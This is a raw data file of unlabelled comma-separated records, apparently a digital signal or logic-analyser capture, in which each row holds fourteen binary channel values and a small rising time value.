1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0154800e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0157600e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0160000e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0162800e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0165200e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0167600e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0170000e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0172400e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0174800e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0177600e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0180000e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0182800e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0185200e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0187600e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0190000e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0192400e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0194800e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0197600e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0200000e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0202800e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0205200e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0207600e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0210000e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0212400e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0214800e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0217600e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0220400e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0222800e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0225200e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0227600e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0230000e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0232400e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0234800e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0237600e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0240000e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0242800e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0245200e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0247600e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0250000e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0252400e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0254800e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0257600e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0260000e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0262800e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0265200e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0267600e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0270000e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0272400e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0274800e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0277600e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0280000e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0282800e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0285200e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0287600e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0290800e-04 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.0292800e-04 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.0295200e-04 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.0298000e-04 1,1,0,0,1,1,0,0,0,1,0,0,0,1,5.2742000e-04 0,0,0,0,1,1,0,0,0,1,0,0,0,1,5.2764400e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,1,5.2766400e-04 0,0,1,0,1,1,0,0,0,1,0,1,0,1,5.2769600e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,1,5.2772400e-04 0,0,1,0,1,1,0,0,0,1,0,0,1,1,5.2803600e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,1,5.2806000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,1,5.2806800e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,1,5.2810800e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,1,5.2813600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,1,5.2818800e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,1,5.2821200e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.2825200e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.2826000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.2828400e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.2833600e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.2836000e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.2841200e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.2843600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.2846000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.2848400e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.2850800e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.2853600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.2858800e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.2861200e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.2866000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.2868400e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.2869200e-04 0,0,1,0,1,1,0,0,0,1,0,0,1,0,5.2873600e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.2876000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.2876800e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.2881200e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.2883600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.2888400e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.2890800e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.2893600e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.2896000e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.2896400e-04 0,0,1,0,1,1,0,0,0,1,0,0,1,0,5.2898800e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.2901200e-04 0,0,1,0,1,1,0,0,0,0,0,0,0,0,5.2901600e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.2902000e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.2906000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.2908400e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.2913600e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.2916000e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.2921200e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.2923600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.2928400e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.2930800e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.2931600e-04 0,0,1,0,1,1,0,0,0,1,0,0,1,0,5.2933600e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.2936000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.2936800e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.2938800e-04 0,0,1,0,1,0,0,0,0,1,0,0,0,0,5.2941200e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.2941600e-04 0,0,1,0,1,1,0,0,0,1,0,0,1,0,5.2946000e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.2948400e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.2949200e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.2950800e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.2953600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.2956000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.2958800e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.2961200e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.2963600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.2966000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.2968400e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.2969200e-04 0,0,1,0,1,1,0,0,0,1,0,0,1,0,5.2973600e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.2976000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.2976800e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.2978800e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.2981200e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.2983600e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.2986000e-04 0,0,1,0,1,0,0,0,0,1,0,0,0,0,5.2986400e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.2986800e-04 0,0,1,0,1,1,0,0,0,1,0,0,1,0,5.2988400e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.2990800e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.2991600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.2996400e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.2998800e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3003600e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3006000e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3010800e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3013600e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.3014000e-04 0,0,1,0,1,1,0,0,0,1,0,0,1,0,5.3016000e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.3018800e-04 0,0,1,0,1,1,0,0,0,0,0,0,0,0,5.3019200e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3019600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3021200e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3023600e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.3024000e-04 0,0,1,0,1,1,0,0,0,1,0,0,1,0,5.3026000e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.3028400e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3029200e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3033600e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3036000e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3041200e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3043600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3048400e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3050800e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3056400e-04 0,0,1,0,1,0,0,0,0,1,0,0,0,0,5.3058800e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.3059200e-04 0,0,1,0,1,1,0,0,0,1,0,0,1,0,5.3061200e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.3063600e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3064400e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3066000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3068400e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.3069200e-04 0,0,1,0,1,1,0,0,0,1,0,0,1,0,5.3073600e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.3076000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3076800e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3078800e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3081200e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3083600e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3086000e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3088400e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3090800e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3093600e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3096000e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.3096400e-04 0,0,1,0,1,1,0,0,0,1,0,0,1,0,5.3101200e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.3103600e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3104400e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3106000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3108400e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3110800e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3113600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3116000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3118800e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3121200e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3123600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3126000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3128400e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3130800e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3133600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3136000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3138800e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3141200e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3143600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3146000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3148400e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3153600e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3156000e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3161200e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3163600e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.3164000e-04 0,0,1,0,1,1,0,0,0,1,0,0,1,0,5.3168400e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.3170800e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3171600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3176400e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3178800e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3183600e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3186000e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3188400e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3190800e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.3191600e-04 0,0,1,0,1,1,0,0,0,1,0,0,1,0,5.3193600e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.3196000e-04 0,0,1,0,1,1,0,0,0,0,0,0,0,0,5.3196400e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3196800e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3201200e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3203600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3208400e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3210800e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3216400e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3218800e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3223600e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3226000e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.3226800e-04 0,0,1,0,1,1,0,0,0,1,0,0,1,0,5.3228400e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.3230800e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3231600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3233600e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3236000e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3238800e-04 0,0,1,0,1,0,0,0,0,1,0,0,0,0,5.3241200e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.3241600e-04 0,0,1,0,1,1,0,0,0,1,0,0,1,0,5.3243600e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.3246000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3246800e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3250800e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3253600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3258800e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3261200e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3266000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3268400e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.3269200e-04 0,0,1,0,1,1,0,0,0,1,0,0,1,0,5.3270800e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.3273600e-04 0,0,1,0,1,1,0,0,0,0,0,0,0,0,5.3274000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3274400e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3276000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3278800e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3281200e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3283600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3286000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3288400e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3290800e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3293600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3296000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3298800e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3301200e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3303600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3306000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3308400e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3310800e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3313600e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.3314000e-04 0,0,1,0,1,1,0,0,0,1,0,0,1,0,5.3316000e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.3318800e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3319200e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3323600e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3326000e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3330800e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3333600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3338800e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3341200e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3346000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3348400e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.3349200e-04 0,0,1,0,1,1,0,0,0,1,0,0,1,0,5.3350800e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.3353600e-04 0,0,1,0,1,1,0,0,0,0,0,0,0,0,5.3354000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3354400e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3356000e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.3358800e-04 0,0,1,0,1,1,0,0,0,1,0,0,1,0,5.3361200e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.3363600e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3364400e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3368400e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3370800e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3376000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3378800e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3383600e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3386000e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3391200e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3393600e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.3394000e-04 0,0,1,0,1,1,0,0,0,1,0,0,1,0,5.3396000e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.3398800e-04 0,0,1,0,1,1,0,0,0,0,0,0,0,0,5.3399200e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3399600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3401200e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3403600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3406000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3408400e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3410800e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3413600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3416000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3418800e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3421200e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3423600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3426000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3428400e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3430800e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3433600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3436000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3438800e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3441200e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3443600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3446000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3448400e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3450800e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3453600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3456000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3458800e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3461200e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3463600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3466000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3468400e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3470800e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3473600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3476000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3478800e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3481200e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3483600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3486000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3488400e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3490800e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3493600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3496000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3498800e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3501200e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3503600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3506000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3508400e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3510800e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3513600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3516000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3518800e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3521200e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3523600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3526000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3528400e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3530800e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3533600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3536000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3538800e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3541200e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3543600e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3546000e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3548400e-04 0,0,1,0,1,0,0,0,0,0,0,0,1,0,5.3550800e-04 0,0,1,0,1,0,0,0,0,0,0,0,0,0,5.3553600e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,0,5.3554000e-04 0,0,1,0,1,1,0,0,0,1,0,0,0,1,6.5932400e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,1,6.5953200e-04 1,0,1,0,1,1,0,0,0,1,0,1,0,1,6.5955200e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,1,6.5958000e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,1,6.5986400e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,1,6.5988800e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,1,6.5990800e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,1,6.5994000e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,1,6.5996400e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,1,6.5998800e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,1,6.6001200e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,1,6.6003600e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,1,6.6006000e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,1,6.6008800e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,1,6.6010800e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,1,6.6014000e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6015600e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6016400e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6018800e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6021200e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6023600e-04 1,0,1,0,1,0,0,0,0,1,0,0,0,0,6.6024000e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6024400e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6026400e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6028800e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6030800e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6034000e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6036400e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6038800e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6041200e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6043600e-04 1,0,1,0,1,1,0,0,0,1,0,0,1,0,6.6046400e-04 1,0,1,0,1,1,0,0,0,1,0,0,0,0,6.6048800e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6049200e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6050800e-04 1,0,1,0,1,0,0,0,0,0,0,0,0,0,6.6053600e-04 1,0,1,0,1,0,0,0,0,0,0,0,1,0,6.6056000e-04 